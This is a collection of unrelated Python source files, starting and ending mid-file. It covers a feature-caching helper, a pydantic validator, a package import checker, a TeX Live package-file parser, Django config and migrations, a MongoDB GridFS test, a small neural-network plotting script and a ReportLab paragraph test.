return stl.column_dropper(['Pclass'])(df)
```
"""
# TODO:
# if cache.is_cached(function.__name__):
# print('Dropper is already registered. Deregistering: ')
# deregister(function.__name__, force=True)
deregister(function.__name__, force=True)
return register(function, cache_default=False)
def selector(function):
"""
Registers function that won't be cached.
Is recommended to be used only with functions which actually select columns or rows and don't produce any new data.
Example:
``` python
@selector
def select_pclass_cabin(df):
return stl.column_selector(['Pclass', 'Cabin'])(df)
```
"""
deregister(function.__name__, force=True)
return register(function, cache_default=False)
def helper(func):
"""
Save function as helper to store its source
and be able to define it in any notebook with kts.helpers.define_in_scope()
:param func: function
:return: function with .source method
"""
assert '__name__' in dir(func), 'Helper should have a name'
func.source = source_utils.get_source(func)
if func.__name__ + '_helper' in cache.cached_objs():
cache.remove_obj(func.__name__ + '_helper')
cache.cache_obj(func, func.__name__ + '_helper')
return func
|
from pydantic import BaseModel, validator
from tracardi.process_engine.tql.condition import Condition
class Configuration(BaseModel):
condition: str
true_action: str = 'add'
false_action: str = 'remove'
true_segment: str
false_segment: str
@validator("condition")
def is_valid_condition(cls, value):
_condition = Condition()
try:
_condition.parse(value)
except Exception as e:
raise ValueError(str(e))
return value
@validator("true_segment")
def is_valid_true_segment(cls, value, values):
if 'true_action' in values and values['true_action'] != 'none':
if value == "":
raise ValueError("Segment can not be empty for action {}".format(values['true_action']))
return value
@validator("false_segment")
def is_valid_false_segment(cls, value, values):
if 'false_action' in values and values['false_action'] != 'none':
if value == "":
raise ValueError("Segment can not be empty for action {}".format(values['false_action']))
return value
|
"""Check for import problems.""" # pylint: disable=invalid-name
# [ Imports:Python ]
import ast
import contextlib
import os
import pathlib
import re
import sys
import types
import typing
# [ Imports:Third Party ]
import setuptools # type: ignore
# [ Types ]
IndexedStrings = typing.List[typing.Tuple[int, str]]
# [ Internals ]
def _get_package_parent_path(path: pathlib.Path) -> pathlib.Path:
parts = path.parts
for index in range(len(parts)):
current_parts = parts[:index + 1]
root, *others = current_parts
upstream_path = pathlib.Path(root).joinpath(*others)
if (upstream_path / '__init__.py').exists():
if not others:
raise RuntimeError("can't get the package parent - the root dir has an __init__.py!")
return upstream_path.parent
return path.parent
def _to_module(path: pathlib.Path) -> str:
parts = path.parts
index = 0
for index in range(len(parts)):
current_parts = parts[:index + 1]
root, *others = current_parts
upstream_path = pathlib.Path(root).joinpath(*others)
if (upstream_path / '__init__.py').exists():
break
module_parts = list(parts[index:])
if module_parts[-1] == '__init__.py':
module_parts = module_parts[:-1]
if module_parts[-1].endswith('.py'):
*others, final = module_parts
final = final[:-3]
module_parts = [*others, final]
return '.'.join(module_parts)
def _rebuild_source_module(module_name: str, *, level: int, path_str: str) -> str:
"""
Rebuild the source module.
If not level, there must be a module name (otherwise we have "from import foo", which is invalid syntax)
If level, we may or may not have a module name:
"from .. import foo" is level 2, no module name
"from .bar import foo" is level 1, module name "bar"
"""
if not level:
return module_name
parent_path = pathlib.Path(path_str)
for _ in range(level):
parent_path = parent_path.parent
relative_module_parent = _to_module(parent_path)
if not module_name:
return relative_module_parent
return f"{relative_module_parent}.{module_name}"
def _parse_imports(path: pathlib.Path) -> typing.List[typing.Tuple[pathlib.Path, int, str]]:
path_str = str(path)
source = path.read_text()
this_ast = ast.parse(source, filename=path_str)
import_nodes = [n for n in this_ast.body if isinstance(n, ast.Import)]
import_from_nodes = [n for n in this_ast.body if isinstance(n, ast.ImportFrom)]
import_from_nodes = [n for n in import_from_nodes if n.module]
imports = []
for this_import_node in import_nodes:
line_number = this_import_node.lineno
for this_name in this_import_node.names:
imports.append((path, line_number, this_name.name))
for this_import_from_node in import_from_nodes:
if not this_import_from_node.module or not this_import_from_node.level:
# "filtering" here because mypy doesn't recognize it if we filter it in the
# list comprehension
continue
line_number = this_import_from_node.lineno
source_module = _rebuild_source_module(this_import_from_node.module, level=this_import_from_node.level, path_str=path_str)
import_source = False
for this_name in this_import_from_node.names:
full_name = f"{source_module}.{this_name.name}"
try:
# validating import
# pylint: disable=exec-used
exec(f"import {full_name}") # nosec
# pylint: enable=exec-used
except ModuleNotFoundError:
import_source = True
else:
imports.append((path, line_number, f"{full_name}"))
if import_source:
imports.append((path, line_number, f"{source_module}"))
return imports
def _is_python_module(module: types.ModuleType) -> bool:
return (
not hasattr(module, '__file__') or
not module.__file__ or
(
'lib/python' in module.__file__ and
'packages' not in module.__file__
)
)
def _is_project_module(module: types.ModuleType, project_paths: typing.List[pathlib.Path]) -> bool:
return (
not _is_python_module(module) and
pathlib.Path(module.__file__) in project_paths
)
def _is_third_party_module(module: types.ModuleType, project_paths: typing.List[pathlib.Path]) -> bool:
return (
not _is_python_module(module) and
not _is_project_module(module, project_paths=project_paths)
)
def _get_module_names(
all_python_paths: typing.List[pathlib.Path],
) -> typing.List[typing.Tuple[pathlib.Path, int, str]]:
all_module_names: typing.List[typing.Tuple[pathlib.Path, int, str]] = []
for this_path in all_python_paths:
all_module_names += _parse_imports(this_path)
return all_module_names
def _get_unique_imports(
all_python_paths: typing.List[pathlib.Path],
) -> typing.Dict[str, typing.Tuple[pathlib.Path, int]]:
all_module_names = _get_module_names(all_python_paths)
unique_imports: typing.Dict[str, typing.Tuple[pathlib.Path, int]] = {}
for this_path, line_number, module_name in all_module_names:
if module_name not in unique_imports:
unique_imports[module_name] = (this_path, line_number)
return unique_imports
def _identify_unused_local_modules(
all_python_paths: typing.List[pathlib.Path],
*,
all_project_modules: typing.Dict[str, typing.Tuple[pathlib.Path, int, types.ModuleType]],
) -> typing.List[str]:
# a '-' in a name means it's not importable as a module - this would just be a script someone calls.
local_modules = [_to_module(p) for p in all_python_paths if '-' not in str(p)]
return [
this_module
for this_module in local_modules
if (
this_module not in all_project_modules and
not any(a.startswith(f"{this_module}.") for a in all_project_modules) and
this_module not in (
'setup', # setup.py
'example_module', # imported by string in test
'test', # the test package
)
)
]
def _load_modules(unique_top_level_imports: typing.Dict[str, typing.Tuple[pathlib.Path, int]]) -> typing.Tuple[typing.Dict[str, typing.Tuple[pathlib.Path, int]], typing.Dict[str, typing.Tuple[pathlib.Path, int, types.ModuleType]]]:
missing_modules = {}
loadable_modules = {}
for module_name, source_data in unique_top_level_imports.items():
try:
# validating import
original_dir = pathlib.Path.cwd()
path = _get_package_parent_path(source_data[0])
if path != original_dir:
sys.path.append(str(path))
# pylint: disable=exec-used
exec(f"import {module_name}") # nosec
# pylint: enable=exec-used
except ModuleNotFoundError:
missing_modules[module_name] = source_data
else:
loadable_modules[module_name] = source_data
finally:
if path != original_dir:
sys.path.remove(str(path))
# all imported modules
actual_modules = {m: (loadable_modules[m][0], loadable_modules[m][1], sys.modules[m]) for m in loadable_modules}
return missing_modules, actual_modules
def _identify_missing_third_party_modules(
third_party_modules: typing.Dict[str, typing.Tuple[pathlib.Path, int, types.ModuleType]],
*,
installed_modules: IndexedStrings,
) -> typing.Dict[str, typing.Tuple[pathlib.Path, int, types.ModuleType]]:
return {
m: s
for m, s in third_party_modules.items()
if (
m not in [m[1] for m in installed_modules] and
m not in (
'setuptools', # included by pip
)
)
}
def _identify_unused_third_party_modules(
third_party_modules: typing.Dict[str, typing.Tuple[pathlib.Path, int, types.ModuleType]],
*,
installed_modules: IndexedStrings,
) -> IndexedStrings:
return [
(index, module_name)
for index, module_name in installed_modules
if (
module_name not in third_party_modules and
module_name not in (
# module names which differ from import names
)
)
]
def _report_package_problems(
*,
missing_modules: typing.Dict[str, typing.Tuple[pathlib.Path, int]],
missing_third_party: typing.Dict[str, typing.Tuple[pathlib.Path, int, types.ModuleType]],
unused_third_party: IndexedStrings,
unused_local: typing.List[str],
) -> bool:
# Error if any missing or unused modules exist.
errors_found = bool(missing_modules or missing_third_party or unused_third_party or unused_local)
# unimportable modules
for name, source_data in missing_modules.items():
print(f"{source_data[0]}:{source_data[1]} -> {name} (unimportable)")
# third-party modules missing from install requires
for name, extended_source_data in missing_third_party.items():
print(f"{extended_source_data[0]}:{extended_source_data[1]} -> {name} (missing-from-install-requires)")
# install requires modules not used
for index, module_name in unused_third_party:
print(f"setup.py:{index} -> {module_name} (unused-install-requires)")
# local modules not imported
for this_path_str in unused_local:
print(f"{this_path_str} (unused-project-module)")
return errors_found
def _report_test_problems(
*,
missing_modules: typing.Dict[str, typing.Tuple[pathlib.Path, int]],
missing_third_party: typing.Dict[str, typing.Tuple[pathlib.Path, int, types.ModuleType]],
unused_third_party: IndexedStrings,
unused_local: typing.List[str],
) -> bool:
# Error if any missing or unused modules exist.
errors_found = bool(missing_modules or missing_third_party or unused_third_party or unused_local)
# unimportable modules
for name, source_data in missing_modules.items():
print(f"{source_data[0]}:{source_data[1]} -> {name} (unimportable)")
# third-party modules missing from install requires
for name, extended_source_data in missing_third_party.items():
print(f"{extended_source_data[0]}:{extended_source_data[1]} -> {name} (missing-from-extras-require)")
# install requires modules not used
for index, module_name in unused_third_party:
print(f"setup.py:{index} -> {module_name} (unused-extras-require)")
# local modules not imported
for this_path_str in unused_local:
print(f"{this_path_str} (unused-test-module)")
return errors_found
def _get_names_of_items_in(target_dir: pathlib.Path) -> typing.Tuple[str, ...]:
local_items = target_dir.iterdir()
local_names = tuple(i.name for i in local_items)
return local_names
def _get_package_dir() -> pathlib.Path:
here = __file__
target_dir = pathlib.Path(here).parent
local_names = _get_names_of_items_in(target_dir)
setup_name = 'setup.py'
while setup_name not in local_names:
target_dir = target_dir.parent
local_names = _get_names_of_items_in(target_dir)
return target_dir
def _get_setup_packages() -> typing.List[str]:
packages = []
for this_package in setuptools.find_packages():
if not isinstance(this_package, str):
raise TypeError(f"Got non-str response from setuptools.find_packages: ({type(this_package)}) {this_package}")
packages.append(this_package)
return packages
def _to_indexed_module_names(indexed_section_lines: IndexedStrings) -> IndexedStrings:
module_name_pattern = r'.*[\'"]([a-zA-Z_\-0-9]+)[\'"],'
indexed_module_names = []
for index, line in indexed_section_lines:
match = re.match(module_name_pattern, line)
if not match:
continue
if '# no-import' in line:
continue
matched_name = match.group(1)
indexed_module_names.append((index, matched_name))
return indexed_module_names
def _get_setup_modules(section: str) -> IndexedStrings:
setup_path = _get_package_dir() / 'setup.py'
setup_lines = setup_path.read_text().splitlines()
start_line_number = None
stop_line_number = len(setup_lines) - 1
indentation = None
enumerated = enumerate(setup_lines)
for index, this_line in enumerated:
if not re.search(f'{section}.*[:=]', this_line):
continue
start_line_number = index
match = re.search(r'^(\s*)', this_line)
# match is guaranteed, because we're asking for *any* space, even none.
match = typing.cast(typing.Match, match)
indentation = match.group(1)
break
else:
# XXX EARLY RETURN
return []
for index, this_line in enumerated:
match = re.search(r'^(\s*)', this_line)
# match is guaranteed, because we're asking for *any* space, even none.
match = typing.cast(typing.Match, match)
this_indentation = match.group(1)
if len(this_indentation) <= len(indentation):
stop_line_number = index
break
enumerated_setup_lines = list(enumerate(setup_lines))
indexed_section_lines = enumerated_setup_lines[start_line_number:stop_line_number]
return _to_indexed_module_names(indexed_section_lines)
@contextlib.contextmanager
def _change_dir(directory: pathlib.Path) -> typing.Generator[None, None, None]:
original_dir = os.curdir
os.chdir(directory)
try:
yield
finally:
os.chdir(original_dir)
def _modules_to_paths(module_names: typing.Iterable[str]) -> typing.List[pathlib.Path]:
current_dir = pathlib.Path.cwd()
paths = []
for name in module_names:
as_module_path = current_dir / f"{name}.py"
if as_module_path.exists():
paths.append(as_module_path)
continue
as_package_path = current_dir / f"{name}"
python_files = [*as_package_path.glob('*.py'), *as_package_path.glob('**/*.py')]
paths += python_files
return paths
def _get_package_python_paths() -> typing.List[pathlib.Path]:
package_dir = _get_package_dir()
with _change_dir(package_dir):
setup_py_packages = _get_setup_packages()
setup_py_modules = [l[1] for l in _get_setup_modules('py_modules')]
return _modules_to_paths(setup_py_packages + setup_py_modules)
def _get_test_python_paths() -> typing.List[pathlib.Path]:
package_dir = _get_package_dir()
with _change_dir(package_dir):
package_path = pathlib.Path.cwd()
all_python_paths = list(package_path.glob('**/*.py'))
package_python_paths = _get_package_python_paths()
return [p for p in all_python_paths if p not in package_python_paths]
def _get_package_modules(package_python_paths: typing.List[pathlib.Path]) -> dict:
imported_by_package = _get_unique_imports(package_python_paths)
missing, installed = _load_modules(imported_by_package)
third_party = {
n: m for n, m in installed.items() if _is_third_party_module(m[2], project_paths=package_python_paths)
}
project = {n: m for n, m in installed.items() if _is_project_module(m[-1], project_paths=package_python_paths)}
specified = _get_setup_modules('install_requires')
return {
'missing': missing,
'third party': third_party,
'project': project,
'specified': specified,
}
def _get_test_modules(test_python_paths: typing.List[pathlib.Path], *, package_python_paths: typing.List[pathlib.Path]) -> dict:
imported_by_test = _get_unique_imports(test_python_paths)
missing, installed = _load_modules(imported_by_test)
third_party = {
n: m for n, m in installed.items() if _is_third_party_module(m[2], project_paths=test_python_paths + package_python_paths)
}
project = {n: m for n, m in installed.items() if _is_project_module(m[-1], project_paths=test_python_paths)}
specified = _get_setup_modules('test')
return {
'missing': missing,
'third party': third_party,
'project': project,
'specified': specified,
}
# [ API ]
def main() -> None:
"""Check the imports for the package."""
# paths that might have imports
package_python_paths = _get_package_python_paths()
test_python_paths = _get_test_python_paths()
# Package...
package_modules = _get_package_modules(package_python_paths)
# Test...
test_modules = _get_test_modules(test_python_paths, package_python_paths=package_python_paths)
# identify problems
missing_third_party_used_by_package = _identify_missing_third_party_modules(
package_modules['third party'],
installed_modules=package_modules['specified'],
)
unused_third_party_installed_by_package = _identify_unused_third_party_modules(
package_modules['third party'],
installed_modules=package_modules['specified'],
)
unused_package_modules = _identify_unused_local_modules(package_python_paths, all_project_modules=package_modules['project'])
missing_third_party_used_by_test = _identify_missing_third_party_modules(
test_modules['third party'],
installed_modules=test_modules['specified'],
)
unused_third_party_installed_by_test = _identify_unused_third_party_modules(
test_modules['third party'],
installed_modules=test_modules['specified'],
)
unused_test_modules = _identify_unused_local_modules(test_python_paths, all_project_modules=test_modules['project'])
# report problems
package_error = _report_package_problems(
missing_modules=package_modules['missing'],
missing_third_party=missing_third_party_used_by_package,
unused_third_party=unused_third_party_installed_by_package,
unused_local=unused_package_modules,
)
test_error = _report_test_problems(
missing_modules=test_modules['missing'],
missing_third_party=missing_third_party_used_by_test,
unused_third_party=unused_third_party_installed_by_test,
unused_local=unused_test_modules,
)
if package_error or test_error:
exit(1)
# [ Script ]
if __name__ == '__main__':
main()
|
print("AREA OF TRIANGLE ")
print("Enter the Sides of Triangle (a,b,c)")
try :
x,y,z=input("ENTER THE VALUES OF X,Y,Z ").split() #split my space
except Exception as e:
print(e)
exit(0)
print(f"X={x}\nY={y}\nZ={z}")
x=int(x)
y=int(y)
z=int(z)
s=(x+y+z)/2
print(f"Semi-perimeter={s}")
area = (s*(s-x)*(s-y)*(s-z)) ** 0.5
print(f"Area of given triangle with sides ({x},{y},{z}) is : {area}")
|
# -*- coding: utf-8 -*-
# Copyright 2016 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test MotorGridFSBucket."""
from io import BytesIO
from gridfs.errors import NoFile
from tornado import gen
from tornado.testing import gen_test
import motor
from test.tornado_tests import MotorTest
class MotorGridFSBucketTest(MotorTest):
async def _reset(self):
await self.db.drop_collection("fs.files")
await self.db.drop_collection("fs.chunks")
await self.db.drop_collection("alt.files")
await self.db.drop_collection("alt.chunks")
def setUp(self):
super().setUp()
self.io_loop.run_sync(self._reset)
self.bucket = motor.MotorGridFSBucket(self.db)
def tearDown(self):
self.io_loop.run_sync(self._reset)
super().tearDown()
@gen_test
async def test_basic(self):
oid = await self.bucket.upload_from_stream("test_filename",
b"hello world")
gout = await self.bucket.open_download_stream(oid)
self.assertEqual(b"hello world", (await gout.read()))
self.assertEqual(1, (await self.db.fs.files.count_documents({})))
self.assertEqual(1, (await self.db.fs.chunks.count_documents({})))
await self.bucket.delete(oid)
with self.assertRaises(NoFile):
await self.bucket.open_download_stream(oid)
self.assertEqual(0, (await self.db.fs.files.count_documents({})))
self.assertEqual(0, (await self.db.fs.chunks.count_documents({})))
gin = self.bucket.open_upload_stream("test_filename")
await gin.write(b"hello world")
await gin.close()
dst = BytesIO()
await self.bucket.download_to_stream(gin._id, dst)
self.assertEqual(b"hello world", dst.getvalue())
|
#!/usr/bin/python3
##
## Script to parse texlive.tlpdb and get list of files in a package
##
## Copyright (C) 2019-2020 Henrik Grimler
##
## This program is free software: you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation, either version 3 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program. If not, see <https://www.gnu.org/licenses/>.
def parse_tlpdb_to_dict(tlpdb_path):
"""Reads given tlpdb database and creates dict with packages, their dependencies and files
"""
with open(tlpdb_path, "r") as f:
packages = f.read().split("\n\n")
pkg_dict = {}
for pkg in packages:
if not pkg == "":
pkg_lines = pkg.split("\n")
pkg_name = pkg_lines[0].split(" ")[1]
# We only care about files and depends
pkg_dict[pkg_name] = {"depends" : [], "files" : []}
i = 0
while i < len(pkg_lines):
if pkg_lines[i].split(" ")[0].startswith("runfiles"):
# Start of file list
i += 1
while i < len(pkg_lines) and pkg_lines[i].startswith(" "):
# files starts with space, for example
# " texmf-dist/tex/latex/collref/collref.sty"
pkg_dict[pkg_name]["files"].append(pkg_lines[i].split(" ")[1])
i += 1
if i == len(pkg_lines):
break
if pkg_lines[i].split(" ")[0] == "depend":
pkg_dict[pkg_name]["depends"].append(pkg_lines[i].split(" ")[1])
i += 1
return pkg_dict
def get_files_in_package(package, files_in_package, visited_pkgs, visit_collections=False):
"""Prints files in package and then run itself on each dependency. Doesn't visit collections unless argument visit_collections=True is passed.
"""
for f in pkg_dict[package]["files"]:
files_in_package.append(f)
for dep in pkg_dict[package]["depends"]:
if dep.split(".")[-1] == "ARCH":
# skip arch dependent packages, which we lack since we build our own binaries
continue
if dep.split("-")[0] == "collection" or visit_collections:
# skip collections unless explicitly told to go through them
continue
if not dep in visited_pkgs:
# avoid duplicates
visited_pkgs.append(dep)
files_in_package, visited_pkgs = get_files_in_package(dep, files_in_package, visited_pkgs)
return files_in_package, visited_pkgs
def Files(packages, bool_visit_collections = False):
"""
Wrapper around function get_files. Does not visit collections unless bool_.
"""
files = []
for pkg in packages:
files += get_files_in_package(pkg, [], [],
visit_collections=bool_visit_collections)[0]
return files
def get_conflicting_pkgs(package):
"""Returns list of packages that contain some files that are also found in 'package'.
These packages should be listed as dependencies.
"""
if package in ["collection-basic"]:
conflicting_pkgs = []
elif package in ["collection-latex"]:
conflicting_pkgs = ["collection-basic"]
elif package in ["collection-langeuropean",
"collection-langenglish",
"collection-langfrench",
"collection-langgerman",
"collection-binextra",
"collection-fontutils",
"collection-langarabic",
"collection-langgreek",
"collection-langitalian",
"collection-langother",
"collection-langpolish",
"collection-langportuguese",
"collection-langspanish",
"collection-metapost",
"collection-fontsrecommended",
"collection-games",
"collection-luatex",
"collection-music",
"collection-plaingeneric",
"collection-publishers",
"collection-texworks",
"collection-wintools"]:
conflicting_pkgs = ["collection-basic",
"collection-latex"]
elif package == "collection-langczechslovak":
conflicting_pkgs = ["collection-basic",
"collection-latex",
"collection-fontsextra",
"collection-luatex"]
elif package == "collection-langcyrillic":
conflicting_pkgs = ["collection-basic",
"collection-latex",
"collection-fontsextra",
"collection-fontsrecommended",
"collection-langgreek",
"collection-latexrecommended"]
elif package == "collection-formatsextra":
conflicting_pkgs = ["collection-basic",
"collection-latex",
"collection-langcyrillic",
"collection-mathscience",
"collection-fontsrecommended",
"collection-plaingeneric"]
elif package == "collection-context":
conflicting_pkgs = ["collection-basic",
"collection-latex",
"collection-mathscience",
"collection-fontsrecommended",
"collection-metapost",
"collection-xetex"]
elif package == "collection-langjapanese":
conflicting_pkgs = ["collection-basic",
"collection-latex",
"collection-langcjk",
"collection-langchinese"]
elif package == "collection-langchinese":
conflicting_pkgs = ["collection-basic",
"collection-latex",
"collection-langcjk",
"collection-fontutils"]
elif package == "collection-bibtexextra":
conflicting_pkgs = ["collection-basic",
"collection-latex",
"collection-binextra"]
elif package == "collection-langcjk":
conflicting_pkgs = ["collection-basic",
"collection-latex",
"collection-langother"]
elif package == "collection-latexrecommended":
conflicting_pkgs = ["collection-basic",
"collection-latex",
"collection-fontsrecommended",
"collection-latexextra",
"collection-pictures",
"collection-plaingeneric"]
elif package == "collection-mathscience":
conflicting_pkgs = ["collection-basic",
"collection-latex",
"collection-langgreek"]
elif package == "collection-langkorean":
conflicting_pkgs = ["collection-basic",
"collection-latex",
"collection-langjapanese",
"collection-langcjk",
"collection-latexrecommended"]
elif package == "collection-latexextra":
conflicting_pkgs = ["collection-basic",
"collection-latex",
"collection-fontsextra"]
elif package == "collection-humanities":
conflicting_pkgs = ["collection-basic",
"collection-latex",
"collection-latexextra"]
elif package == "collection-pictures":
conflicting_pkgs = ["collection-basic",
"collection-latex",
"collection-latexextra"]
elif package == "collection-fontsextra":
conflicting_pkgs = ["collection-basic",
"collection-latex",
"collection-plaingeneric",
"noto",
"alegreya",
"montserrat",
"fira",
"lato",
"mpfonts",
"libertine",
"drm",
"poltawski",
"cm-unicode",
"roboto",
"dejavu",
"plex",
"stickstoo",
"ebgaramond",
"ipaex-type1",
"paratype",
"antt",
"cormorantgaramond",
"libertinus-type1"]
elif package == "collection-pstricks":
conflicting_pkgs = ["collection-basic",
"collection-latex",
"collection-plaingeneric"]
elif package == "collection-xetex":
conflicting_pkgs = ["collection-basic",
"collection-latex"]
elif not package.startswith("collection-"):
conflicting_pkgs = ["collection-basic",
"collection-latex"]
else:
raise ValueError(sys.argv[1]+" isn't a known package name")
return conflicting_pkgs
if __name__ == '__main__':
import sys
tlpdb = sys.argv[2]
pkg_dict = parse_tlpdb_to_dict(tlpdb)
if len(sys.argv) > 2 and sys.argv[-1] == "print_names":
"""Generate dependencies to put into TERMUX_SUBPKG_DEPENDS"""
# Strip latex and basic since those are part of termux package "texlive"
pkgs_in_texlive = ["latex", "basic"]
dependencies = ["texlive-"+pkg for pkg in get_conflicting_pkgs(sys.argv[1]) if not pkg in pkgs_in_texlive]
if len(dependencies) > 0:
print("texlive, "+", ".join(dependencies))
else:
print("texlive")
else:
"""Print files which should be included in the subpackage"""
# The last set of packages are needed to make our texlive package able to
# generate pdflatex.fmt and compile a simple LaTeX test file, so they
# should be part of texlive.
print("\n".join(["share/texlive/"+line for line in
list( set(Files([sys.argv[1]])) -
set(Files(get_conflicting_pkgs(sys.argv[1]))) -
set(Files(["dehyph-exptl",
"hyphen-afrikaans",
"kpathsea",
"amsfonts",
"texlive-scripts-extra",
"l3backend",
"latexconfig",
"tex-ini-files"])) )]))
|
from django.apps import AppConfig
from django.contrib.auth import get_user_model
class UsermanagerdemoConfig(AppConfig):
name = 'cradmin_legacy.demo.usermanagerdemo'
verbose_name = "Usermanager demo"
def ready(self):
from cradmin_legacy.superuserui import superuserui_registry
appconfig = superuserui_registry.default.add_djangoapp(
superuserui_registry.DjangoAppConfig(app_label='usermanagerdemo'))
user_model = get_user_model()
appconfig.add_model(superuserui_registry.ModelConfig(model_class=user_model))
|
# Generated by Django 2.0.2 on 2018-03-06 16:44
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import model_utils.fields
class Migration(migrations.Migration):
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
('django_dynamic_forms', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='DynamicOptionSelects',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('object_id', models.PositiveIntegerField()),
('content_type', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='contenttypes.ContentType')),
],
options={
'verbose_name_plural': 'dynamic option select',
},
),
migrations.CreateModel(
name='FormAttribute',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('css_class', models.CharField(blank=True, max_length=256, null=True, verbose_name='css class')),
('is_required', models.BooleanField(default=False, verbose_name='is required?')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='SimpleOptionSelects',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('code', models.CharField(max_length=100, verbose_name='code')),
('name', models.CharField(max_length=256, verbose_name='name')),
],
options={
'verbose_name_plural': 'simple option select',
},
),
migrations.RemoveField(
model_name='valueattribute',
name='dynamic_attribute',
),
migrations.RemoveField(
model_name='valueattribute',
name='dynamic_form',
),
migrations.AddField(
model_name='dynamicform',
name='code',
field=models.CharField(default=None, max_length=256, verbose_name='code'),
preserve_default=False,
),
migrations.AddField(
model_name='dynamicform',
name='css_class',
field=models.CharField(blank=True, max_length=256, null=True, verbose_name='css class'),
),
migrations.AddField(
model_name='dynamicform',
name='is_wizard',
field=models.BooleanField(default=False, verbose_name='is wizard?'),
),
migrations.AlterField(
model_name='dynamicattribute',
name='field_type',
field=models.CharField(choices=[('TXT', 'Text'), ('TXB', 'Textarea'), ('CHK', 'Checkbox'), ('RDO', 'Radio'), ('SLT', 'Select')], max_length=100, verbose_name='field types'),
),
migrations.AlterField(
model_name='dynamicform',
name='attribute',
field=models.ManyToManyField(through='django_dynamic_forms.FormAttribute', to='django_dynamic_forms.DynamicAttribute', verbose_name='attribute'),
),
migrations.DeleteModel(
name='ValueAttribute',
),
migrations.AddField(
model_name='formattribute',
name='dynamic_attribute',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='django_dynamic_forms.DynamicAttribute', verbose_name='attribute'),
),
migrations.AddField(
model_name='formattribute',
name='dynamic_form',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='django_dynamic_forms.DynamicForm', verbose_name='form'),
),
migrations.AddField(
model_name='dynamicoptionselects',
name='parent',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='django_dynamic_forms.DynamicAttribute', verbose_name='parent'),
),
]
|
# modules
import matplotlib.pyplot as plt
from sklearn.datasets import make_moons
from neural_network import NeuralNetwork
# prepare dataset
X, y = make_moons(n_samples=200, noise=0.2, random_state=42)
# instantiate a NeuralNetwork object and train the network
nn = NeuralNetwork(X, y, learning_rate = 0.001, epochs = 5000)
hidden_weights, outer_weights = nn.train()
# plot the loss over epochs and the accuracy
fig, (ax1, ax2) = plt.subplots(nrows=2, ncols=1, sharex=True, figsize=(15, 8))
ax1.plot(nn.loss_values)
ax1.set_ylabel('Loss Value')
ax1.set_title('LOSS OVER TRAINING EPOCHS')
ax2.plot(nn.acc)
ax2.set_xlabel('Number of Epochs')
ax2.set_ylabel('Accuracy')
ax2.set_title('ACCURACY OVER TRAINING EPOCHS')
plt.show() |
""""
scrapyd api 的异步实现
"""
|
from allauth.utils import get_user_model
def create_user():
"""Creates a test user."""
user_model_class = get_user_model()
return user_model_class.objects.create_user(
username='testuser', password='testpass'
)
|
#Copyright ReportLab Europe Ltd. 2000-2004
#see license.txt for license details
#history http://www.reportlab.co.uk/cgi-bin/viewcvs.cgi/public/reportlab/trunk/reportlab/test/test_paragraphs.py
# tests some paragraph styles
import unittest
from tests.utils import makeSuiteForClasses, outputfile, printLocation
from reportlab.platypus import Paragraph, SimpleDocTemplate, XBox, Indenter, XPreformatted
from reportlab.lib.styles import ParagraphStyle
from reportlab.lib.units import inch
from reportlab.lib.colors import red, black, navy, white, green
from reportlab.lib.randomtext import randomText
from reportlab.rl_config import defaultPageSize
from wordaxe.rl.styles import getSampleStyleSheet, ParagraphStyle
from wordaxe.rl.NewParagraph import Paragraph
(PAGE_WIDTH, PAGE_HEIGHT) = defaultPageSize
def myFirstPage(canvas, doc):
canvas.saveState()
canvas.setStrokeColor(red)
canvas.setLineWidth(5)
canvas.line(66,72,66,PAGE_HEIGHT-72)
canvas.setFont('Times-Bold',24)
canvas.drawString(108, PAGE_HEIGHT-54, "TESTING PARAGRAPH STYLES")
canvas.setFont('Times-Roman',12)
canvas.drawString(4 * inch, 0.75 * inch, "First Page")
canvas.restoreState()
def myLaterPages(canvas, doc):
canvas.saveState()
canvas.setStrokeColor(red)
canvas.setLineWidth(5)
canvas.line(66,72,66,PAGE_HEIGHT-72)
canvas.setFont('Times-Roman',12)
canvas.drawString(4 * inch, 0.75 * inch, "Page %d" % doc.page)
canvas.restoreState()
class ParagraphTestCase(unittest.TestCase):
"Test Paragraph class (eyeball-test)."
def test0(self):
"""Test...
The story should contain...
Features to be visually confirmed by a human being are:
1. ...
2. ...
3. ...
"""
story = []
#need a style
styNormal = ParagraphStyle('normal')
styGreen = ParagraphStyle('green',parent=styNormal,textColor=green)
# some to test
stySpaced = ParagraphStyle('spaced',
parent=styNormal,
spaceBefore=12,
spaceAfter=12)
story.append(
Paragraph("This is a normal paragraph. "
+ randomText(), styNormal))
story.append(
